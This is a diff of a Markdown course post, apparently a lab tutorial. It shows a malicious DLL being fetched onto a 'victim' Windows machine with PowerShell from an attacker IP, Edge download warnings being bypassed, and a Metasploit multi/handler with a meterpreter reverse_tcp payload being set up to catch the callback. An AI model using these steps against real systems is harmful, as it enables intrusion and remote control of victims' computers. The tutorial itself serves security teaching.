faanross/faanross.github.io/content/posts/course01.md

 {{< figure src="/img/image038.png" title="" class="custom-figure" >}}

-4. Now we'll head over to the victim's system, we can either run a powershell command to download the file, or very simply open the browser (Edge) and type in the address bar write `http://IP of hacker:port of http server`, for example:
+4. Now we'll head over to the victim's system, we can either run a powershell command to download the file (`Invoke-WebRequest -Uri "http://192.168.230.155:8008/evil.dll" -OutFile "evil.dll" `), or simply open the browser (Edge) and type in the address bar  `http://IP of hacker:port of http server`, for example:

-{{< figure src="/img/image039.png" title="" class="custom-figure" >}}
+{{< figure src="/img/image039.png" title="" class="custom-figure-2" >}}

 5. As you can see in the image above, you should see the dll file.
 If you don't, you either did not generate it, OR most likely you are not running the http server from the same directory.
 Now simply right-click on the DLL, `Save link as`, and in my case I will save it to desktop.
 Note that Edge may block the download, for example:

-{{< figure src="/img/image040.png" title="" class="custom-figure" >}}
+{{< figure src="/img/image040.png" title="" class="custom-figure-2" >}}

 If this is the case, click on the three dots `...` to the right of this message (More actions), and select `Keep`.
 You'll be confronted with another warning, select `Show more`, then `Keep anyway`.
-That should have finally done the trick!

-{{< figure src="/img/image042.png" title="" class="custom-figure" >}}
+{{< figure src="/img/image042.png" title="" class="custom-figure-2" >}}

 Ok, we now have our malicious DLL on the victim's disk.

 6. So as we shared in the theory section of this course, this initial stager does one thing (at least on main thing): it calls back to the attacking machine to establish a connection and put in motion the subsequent series of events.
 But we can't run it just yet since we need something on our attacking machine that is actually listening and awaiting that call, ie the handler.
-So let's head over to our Kali VM, and in the terminal we'll run the following commands:
+So let's head over to our Kali VM.
+- Now, let's run these commands:
     - `msfconsole`: this will open our metasploit console.
     - ` use exploit/multi/handler`: this sets up a generic payload handler inside the Metasploit framework.
 The `multi` in the command denotes that this is a handler that can be used with any exploit module, as it is not specific to any particular exploit or target system.
 The `handler` part of the command tells Metasploit to wait for incoming connections from payloads.
 Once the exploit is executed on the target system, the payload will create a connection back to the handler which is waiting for the incoming connection.
     - `set payload windows/meterpreter/reverse_tcp`:  tells Metasploit what payload to use in conjunction with the previously selected exploit.
 The payload is the code that will be executed on the target system after a successful exploit. `windows`: This tells the framework that the target system is running Windows. `meterpreter`: Meterpreter is a sophisticated payload that provides an environment for controlling, manipulating, and navigating the target machine. `reverse_tcp`: This creates a reverse TCP connection from the target system back to the attacker's system.
 When the payload is executed on the target system, it will initiate a TCP connection back to the attacker’s machine (where Metasploit is running).

 {{< figure src="/img/image043.png" title="" class="custom-figure" >}}